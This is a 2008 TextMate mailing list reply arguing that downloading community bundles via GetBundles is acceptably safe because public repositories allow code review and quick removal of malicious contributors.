[TxMt] Re: GitHub bundles and security?

Ale Muñoz bomberstudios at gmail.com
Tue Dec 23 18:58:08 UTC 2008


On Tue, Dec 23, 2008 at 1:53 PM, Geoffrey Hutchison
<geoff at geoffhutchison.net> wrote:
> technically speaking, GetBundles lets you
> download unknown bundles which can execute arbitrary code on my machine.

Remember, you are downloading code from public code repositories, where you can

a) check the code for security issues

b) identify the creator and report those issues

I think if somebody where to include malicious code on a bundle, it
would be kicked out of the community quite fast...

On the other hand, code does not always work as expected and yes,
there is a risk some script running out of control ends up erasing
your whole hard disk... But I think we've done a pretty good job until
now (meaning: all stuff in edge is pretty well tested before it gets
out in a public release : )

Me, I'd rather have an open space, nicely gardened by volunteers than
a walled sandbox.

Just my 0.02


-- 
Ale Muñoz
http://sofanaranja.com
http://bomberstudios.com


More information about the textmate mailing list